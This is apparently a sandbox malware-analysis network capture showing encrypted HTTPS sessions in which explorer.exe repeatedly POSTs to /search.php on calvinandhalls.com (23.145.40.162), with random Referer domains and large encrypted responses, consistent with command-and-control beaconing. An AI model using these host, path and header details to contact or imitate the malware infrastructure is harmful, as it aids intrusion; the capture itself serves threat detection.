                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: b2 e5 af 70 b2 7e 99 be b5 52 4f a7 a8 c5 1d b9 36 13 88 8a 19 4c 68 a4 a7 4b 4c ec f8 d8 ea f9 29 b9 7a 3c 33 77 a3 96 64 4f e7 6b d3 06 84 b4 ad c3 76 4b 31 72 a8 44 ca 89 f2 01 aa c4 fa 6e 40 ce 74 57 04 46 15 e5 49 f4 6f ec f3 ea ed 65 af 3a 0d bd a2 cf a3 fa 53 90 6b e6 4c 30 43 23 e2 68 b8 ec 55 fe 27 11 7a f0 28 35 ba 3d 49 ee 48 d7 97 92 b6 75 79 b1 f3 76 8a e4 13 d5 29 bd 63 7c ca 31 26 4e 5f 67 b2 0f 2d cb 87 6c 56 06 a9 6b b8 34 6a 03 78 55 33 0b 79 3e c3 ea e4 26 67 75 c2 41 ca d6 7a d3 4e fa 13 d0 cb 5a 8a 5c c4 59 10 17 05 1e 41 56 48 a2 4c be 9c 79 81 79 b1 81 83 7e 1e 48 e0 2d f2 09 28 26 6e d0 68 70 37 c8 93 58 15 54 b5 18 86 d6 df 95 89 2b 70 5b c7 20 6a 89 82 12 b4 2a 7e ef 91 4e 94 3d cd 43 81 ed 01 5a 45 77 5d 28 d1 dd 17 d2 be 78 31
                                                                                                                                                              Data Ascii: p~RO6LhKL)z<3wdOkvK1rDn@tWFIoe:SkL0C#hU'z(5=IHuyv)c|1&N_g-lVk4jxU3y>&guAzNZ\YAVHLyy~H-(&nhp7XT+p[ j*~N=CZEw](x1
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: 21 b1 f3 8c 26 82 9c e4 c9 85 98 03 b2 64 bf f8 93 92 3e bb 63 75 d5 47 07 21 4a d2 2a 8c df d3 7c f5 c7 cc 8c 95 cd 92 ae cb 27 bd 4b bb 7f 74 98 18 0c 8a a4 21 84 e6 3a 80 82 18 a4 a6 d4 0b d8 61 94 a3 c5 38 bd 6a 22 6b 07 28 6c a1 ff a1 df 70 e5 5c 54 58 28 78 ec 42 d0 0b b4 d1 3f b8 cb fe 90 ba 69 e8 e0 05 9e 5a bf ab ba 7c 08 a5 2e 2b 94 bf 8b 7e b2 b6 60 d2 c3 7e 12 98 4a fb c1 63 5c db ac 86 fc 3f d0 46 04 91 0f 5f 5d 43 eb 0e 4d ca 9b dd 02 13 f8 f6 82 68 20 79 1d 93 6c b0 ce 52 9c f5 46 0e 0a 04 0a c2 4d f3 48 4e 3d 5e 5b 72 65 18 08 80 8f 06 10 a2 21 87 d9 02 f1 ba 35 c7 92 39 54 d0 e3 b3 4f 42 7e ff 26 c2 08 d8 d0 d0 1d eb cc 16 c1 10 05 fc ab 52 e2 24 46 09 30 9f 26 55 3e 41 2c 36 ec 46 bf e7 47 8c 8f 3a 24 62 d6 3b 36 81 6e 03 71 4b 25 f4 8f
                                                                                                                                                              Data Ascii: !&d>cuG!J*|'Kt!:a8j"k(lp\TX(xB?iZ|.+~`~Jc\?F_]CMh ylRFMHN=^[re!59TOB~&R$F0&U>A,6FG:$b;6nqK%
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: a0 87 ee b0 d3 28 ae 71 bd b5 9e 32 b5 67 75 92 a2 bf 93 f2 32 0d 6d f0 b0 91 4c 70 71 bb 25 aa fe a4 1f 58 d8 ba d7 59 82 d9 b2 3a 29 8b e8 b7 52 1d 1f 17 48 0f 96 37 e2 cc 33 78 52 03 67 5f 92 a6 7b cc d2 26 69 2c ce 82 e5 95 5c e2 1f 9a 21 de d3 e9 c9 52 08 40 2d d8 c9 de ed 08 62 5d 62 40 4e ed bc 24 a7 ef 8c e1 d2 b0 11 5b 08 be 98 3b 79 d3 34 75 3f b7 b3 3a 29 13 da 23 d9 30 4d 84 b2 05 17 5b 5c 2a 29 1e 78 c3 fd 6c 42 1f 3c 54 36 8d 0f 77 08 e5 6b 9f 21 dd 26 6c cb 43 d5 ac f5 d8 c0 f5 96 b1 f5 26 f8 a6 ca 2b a0 4e 7c 50 da f8 1b ac 34 61 c6 1a 02 f3 4c 66 3c 17 5b c2 0d d4 88 bd ed d1 db 36 85 1d 55 4d 45 82 dd df a2 fb 12 41 3b 95 e4 ed ba 50 e6 47 fa b0 d4 bf f8 9f b0 5f 45 e4 88 dd 91 0f dd 11 04 1f 49 a5 69 96 27 60 74 64 29 15 12 5e 9f 3b c0
                                                                                                                                                              Data Ascii: (q2gu2mLpq%XY:)RH73xRg_{&i,\!R@-b]b@N$[;y4u?:)#0M[\*)xlB<T6wk!&lC&+N|P4aLf<[6UMEA;PG_EIi'`td)^;
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: da 41 e1 e6 62 2a a6 14 76 9b 14 3b 3d 4f ab 6a 90 80 f4 ab bc d9 d7 47 41 7d 22 49 e5 ac b4 ea 8b db 98 a8 e1 58 40 e1 e3 22 65 88 3d d2 c0 8b 1c fd 59 37 80 a1 53 f8 9b 34 11 16 15 9e 29 56 65 ce 32 3c 8a 8f 5f 0f 85 18 62 dd ec b5 75 ca ad 44 b6 35 ef bd 5b 05 5f fe 4b c7 a1 1f bf 9d ad 5f 6e 80 cc cf 5d aa 8b 16 bb d3 1c 33 9d c1 bb c5 2d 1d 79 99 c6 54 1e 78 2b 89 04 ba 28 68 29 71 63 7f d4 4f 2c a4 97 00 21 cc 22 9f 41 a5 88 2a b7 1c 34 83 e4 9c e0 70 97 de f6 ff 39 7a 48 5e c1 16 9b f8 b2 28 9e ba 26 8e b4 f7 45 5b 39 14 46 8f 97 57 71 2b e3 50 24 95 d7 81 94 f6 61 84 c1 37 d1 b7 35 6a 72 d7 0a 37 03 1d 44 5d 9f 65 42 ed 33 54 10 9d 98 ff 69 f5 08 a8 f7 db e4 11 ab 34 32 15 9d 45 a2 dc 55 53 a0 71 ed 33 15 56 39 f4 d0 b3 3d 19 29 08 23 c8 d7 db a7
                                                                                                                                                              Data Ascii: Ab*v;=OjGA}"IX@"e=Y7S4)Ve2<_buD5[_K_n]3-yTx+(h)qcO,!"A*4p9zH^(&E[9FWq+P$a75jr7D]eB3Ti42EUSq3V9=)#


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.84973823.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:44 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://mcjvrcrjrartnd.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 223
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:44 UTC223OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 2d c6 06 b3 c1 dd 00 52 ab 00 1e 8e 59 8a eb 2f 6c d9 3f 03 3d d8 eb d4 6e e3 b8 6b 18 cc b6 3b bb 6b 50 96 ff 7b 0e 6b 64 47 25 d8 1a a1 91 86 37 cb fd 76 0b 09 e3 00 12 e7 77 1c 82 c2 89 bc 2e 72 96 5a ba 6d 99 76 5e b9 03 cc 20 38 5f 2e 5b d8 fa 67 bf c2 6f d0 09 6e fc bc bc 4a ad fb 1a f3 b6 9c c1 2e 20 bb bc c1 48 56 b6 6f 29 c2 31 76 28 9c 69 2d 3b db 36 1d 2c 83 cc f6 32 23 d5 fa 0a bf 76 f4 a5 b2 71 28 0d 35 cc 19 37 08 7c
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[CLj4%<-RY/l?=nk;kP{kdG%7vw.rZmv^ 8_.[gonJ. HVo)1v(i-;6,2#vq(57|
                                                                                                                                                              2024-09-30 13:38:44 UTC294INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:44 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-09-30 13:38:44 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 5d 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                                                                              Data Ascii: 1ee6][!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                                                                              2024-09-30 13:38:44 UTC18INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                                                                              Data Ascii: JMQF 82
                                                                                                                                                              2024-09-30 13:38:44 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-09-30 13:38:44 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                                                                              Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                                                                              2024-09-30 13:38:44 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                                                                              Data Ascii: l
                                                                                                                                                              2024-09-30 13:38:44 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-09-30 13:38:44 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                                                                              Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                                                                              2024-09-30 13:38:44 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                                                                              Data Ascii: `O'
                                                                                                                                                              2024-09-30 13:38:44 UTC2INData Raw: 0d 0a
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.84973923.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:45 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://niarejwvgfav.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 318
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:45 UTC318OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 3d f5 6e b4 d2 b1 20 5e c6 6c 61 f3 71 f1 e1 62 20 ab 08 5b 4d 93 bd c1 53 ef d7 78 1a f4 a3 6c e6 55 3c a2 8b 04 15 48 73 3e 00 8d 38 8b e9 aa 2c f3 e7 77 0e 50 88 65 23 f3 50 03 fb 92 ec 92 14 75 95 1b b2 46 8b 32 58 dd 36 dd 77 53 7d 1f 7c c2 e4 4f ea b3 04 ec 27 71 f7 c0 d3 20 ff 83 7a bf 88 e1 de 07 67 ac 8c bf 55 4f 93 75 30 d0 3d 57 4a 91 6c 05 2c cb 4e 07 36 e6 b2 84 65 7f 98 ae 21 e6 49 ce e9 fb 3c 1c 3b 40 a3 76 7f 11 4b 03 b8 46 b3 c6 7e 01 2f 7c 3e f9 ea 33 7b 5a 36 d0 c1 fc 53 fc c2 3f c6 7c cd 83 e7 83 18 93 7c
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lj4%<=n ^laqb [MSxlU<Hs>8,wPe#PuF2X6wS}|O'q zgUOu0=WJl,N6e!I<;@vKF~/|>3{Z6S?||
                                                                                                                                                              2024-09-30 13:38:46 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:46 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.84974023.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:46 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://lkfxgtbclffake.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 141
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:46 UTC141OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 52 b1 28 f2 9a ee 13 1e c1 30 27 81 7e fd 84 6d 1b b2 67 46 27 d6 e3 c6 68 a7 a8 6d 0b f3 9b 60 99 53 2d bc ed 77 0a 35 19 42 21 f3 00 a9 d4 df 5f cd fa 4a 70 23 97 17 54 e8 30 17 86 fd cb
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lk4%<R(0'~mgF'hm`S-w5B!_Jp#T0
                                                                                                                                                              2024-09-30 13:38:47 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:47 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.84974123.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:47 UTC290OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://fyhvuoiqukrfjpjs.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 199
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:47 UTC199OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 23 bb 74 b1 b1 e5 40 32 a9 66 1e ec 26 c5 cd 22 1b a8 65 04 4c ab ca ee 2b a0 d6 0b 5b 9e fd 3a ae 5a 58 fd 86 05 3d 25 77 03 47 96 1d b7 95 a0 45 85 e0 30 71 56 8e 11 36 cc 3e 62 d8 ca bc d5 5b 6d b6 5d fa 21 a2 63 26 c7 37 d8 52 34 37 35 18 d6 fa 75 a6 a2 3f f2 0c 07 e0 ca a5 29 c5 fc 70 ae d2 9d a0 04 54 a3 a5 af 43 0d b6 75 3e ed 34 01 43 e4 54 03 41 fa 77
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lh4%<#t@2f&"eL+[:ZX=%wGE0qV6>b[m]!c&7R475u?)pTCu>4CTAw
                                                                                                                                                              2024-09-30 13:38:48 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:47 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.84974223.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:48 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://jmcgnnydyiyvfde.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 122
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:48 UTC122OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 49 ee 39 98 b4 d5 4c 3b cc 39 01 87 2b f5 9f 64 71 d6 07 31 4b ab d9 9f 44 b1 f5 19 1f c0 b9 21 93 47 33 98 80 1e 69 3c 6b 17 43 aa
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Li4%<I9L;9+dq1KD!G3i<kC
                                                                                                                                                              2024-09-30 13:38:49 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:48 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.84974323.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:50 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://vjdyvxrsjwk.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 205
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:50 UTC205OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 2e fd 6e ec c3 d1 0b 52 cb 31 27 f6 2a f5 9f 19 1f d1 2f 10 3c d2 a5 8e 30 cc fb 73 05 d6 8f 4b aa 30 21 9f 9c 1e 29 3d 68 3d 49 c2 62 dc 9e cf 02 8b af 2c 68 2a e3 11 00 bb 49 7a 87 c6 f2 d3 32 19 bf 53 a8 5a 82 0f 4b ce 39 d1 2c 78 57 75 1a a8 f5 5b e0 b1 35 f5 50 62 db b3 b6 5a e9 9a 63 f0 b0 fe 81 3b 4b cc 9a 9f 4c 5e d7 69 2f 93 2d 08 50 91 49 2b 3c df 18 68 0e d2 9f 87 40
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Ln4%<.nR1'*/<0sK0!)=h=Ib,h*Iz2SZK9,xWu[5PbZc;KL^i/-PI+<h@
                                                                                                                                                              2024-09-30 13:38:51 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:51 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.84974423.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:52 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://phwhrimonssxx.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 271
                                                                                                                                                              Host: calvinandhalls.com
                                                                                                                                                              2024-09-30 13:38:52 UTC271OUTData Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3b db 06 94 a4 dc 04 20 a1 77 01 9f 50 81 f0 29 20 dc 2f 3f 36 a3 d2 86 5d b3 ac 15 41 da 89 41 8a 62 4a 82 fd 70 04 7e 10 0a 24 fe 1d d3 fb db 53 db b6 63 0b 1a a0 5c 22 b7 24 68 f1 fa 90 87 5f 76 d9 50 dd 67 83 18 54 9c 29 d2 4c 3f 3c 74 6a c7 fb 11 e2 8a 13 82 18 15 e7 aa 8e 04 be f1 6b 9f c4 a2 93 37 7a 9f b0 92 64 39 da 0a 27 9a 3d 40 50 88 45 1b 25 d5 15 00 34 90 ce 8e 25 23 c5 b1 6c 89 4b 85 ad c4 10 30 64 7e dc 7d 0d 75 3f 76 cc 3f fa d1 28 31 07 7c 52 d4 88 55 50 12 4b 9f ee 93 3c ea b3 34 fe 2c b4 b6 ec 91 49 d5 75
                                                                                                                                                              Data Ascii: ryid8a(f|5r2,)%P g3iqH[@Lo4%<; wP) /?6]AAbJp~$Sc\"$h_vPgT)L?<tjk7zd9'=@PE%4%#lK0d~}u?v?(1|RUPK<4,Iu
                                                                                                                                                              2024-09-30 13:38:52 UTC278INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:52 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.84974523.145.40.1624434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:52 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: https://hqblemeoblb.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 230
                                                                                                                                                              Host: calvinandhalls.com
